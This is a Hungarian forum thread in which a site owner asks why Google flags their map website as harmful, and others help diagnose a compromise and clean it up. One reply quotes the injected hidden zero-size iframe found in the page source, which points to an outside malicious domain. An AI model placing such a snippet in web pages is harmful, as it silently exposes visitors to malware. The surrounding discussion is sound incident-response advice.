Az oldal káros lehet a számítógéped számára.
Ma vettem észre, hogy egyik oldalunkon hxxp://www.terkepkalauz.hu -val valami nagy gáz van, beírva a keresőbe pl. a térkép szót a szokásos első oldalon megjelenik de az alábbi kiegészítéssel "Az oldal káros lehet a számítógéped számára." mi lehet ez?!:cursing:
re: Az oldal káros lehet a számítógéped számára.
Nézd meg itt az I am the owner of this site...-nál, hogy mit tehetsz:
http://www.stopbadware.org/reports/c...rkepkalauz.hu/
re: Az oldal káros lehet a számítógéped számára.
IE7 böngészőm riasztott, hogy valami Vezérlőt akar a lap elindítani...
illetve a háttérben valami másik weblapot akart betölteni, de itt aztán kifagyott a böngészőm, elég csúnyán. A firefox böngészőm éppenhogy csak megbírkózott vele, de aztán betöltött.
Pl. ilyen van a forráskód végén, amit nem nagyon tudok mire vélni:
<iframe src="http://in-in.in/in/" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>
Ezt te illeszted be oda? Akkor ok.
Illetve még a Google Webmester Tools-ban kellene aktiválni a lapod, "ő" megmondja talán, mi baja van. A hackelt lapok viselkednek hasonlóan - vagy valami távoli scriptet, frame-t hackeltek meg (csak egy példa: a lapodon ott a hetek.hu hírei iframe kódban - ha azt az oldalt feltörték, az a kód a lapodon is megjelenik, ergo: a lapodra látogató userre is hatással van), és onnan jön át a lapodra a veszélyes kód)
re: Az oldal káros lehet a számítógéped számára.
a nod valami csúnyaságot talált az oldalon, van róla kép is, mindjárt felteszem valahova...
addig is az ftp hozzáférésed jelszavát szélsebesen változtasd meg, illetve könyörögj a szolgálatónak, hogy változtassa meg.
a csúnyakódot töröld az oldalról, csinálj vírusirtást, kémprogram keresést.
ez lesz itt a csúnyaoldal, ahova valami elirányítja a böngészőt:
http://viruskommando.hu/images//terkep2.png
Ez meg itt a nod32 véleménye a dologról:
http://viruskommando.hu/images//terkepkalauzhu.jpg
re: Az oldal káros lehet a számítógéped számára.
Úgy néz ki, hogy feltörték tényleg, most lekérem a log fájt.
re: Az oldal káros lehet a számítógéped számára.
"Az oldal káros lehet a számítógéped számára" google keresés szerint nem te vagy az első meg vlsz utolsó aki igy járt
re: Az oldal káros lehet a számítógéped számára.
Idézet:
staurn45 eredeti hozzászólása
"Az oldal káros lehet a számítógéped számára" google keresés szerint nem te vagy az első meg vlsz utolsó aki igy járt
mivel elég nehéz ügy, remélhetőleg minél kevesebben járnak így a jövőben...
re: Az oldal káros lehet a számítógéped számára.
Tényleg, valakinek nincs kedve túrni valami dokumentációt, hogyan lehetne pro-aktivan elébe menni ennek és védekezni ellene?
re: Az oldal káros lehet a számítógéped számára.
valszeg egy robot tört be az oldaladra és elhelyezett egy vírust. Ezek vagy egy kritikus biztonsági résen keresztül jutnak be , vagy ederetileg a gépeden rejtőzik egy vírus ami ftp csatlakozásnál megjegyezte az adatokat, továbbította és így azt csinálnak a honlapoddal amit akarnak.
Érdemes kiírtani a honlapról a vírust (javascript szokott lenni kódolt változatban html, php fájlokban) aztán megváltoztatni az ftp adatokat.
Ha ez megvan mehetsz a google fiókodba felülbírálást kérni.
re: Az oldal káros lehet a számítógéped számára.
Sajnos a log fájlt még nem tudtuk lekérni, hogy kiderüljön hol törtek be. Az eredeti állapotot sikeresen felraktam a biztonsági mentésről. Sajnos úgy néz ki, hogy ezen a tárhelyen levő összes Joomlás honlapunk érintett lett a dologban.
A Térképkalauz esetében a megtisztítást azonnal jeleztük, és a Google hihetetlen gyorsan reagált, és már le is vette a blokkolást.
Elképzelhető, hogy egy régebbi Rockettheme sablon-ban levő biztonsági rés volt a hibás, de lehet, hogy Adrianweb által leírt ftp jelszó lopás, mivel a céges gépem a héten bekrepált vírusosság miatt :(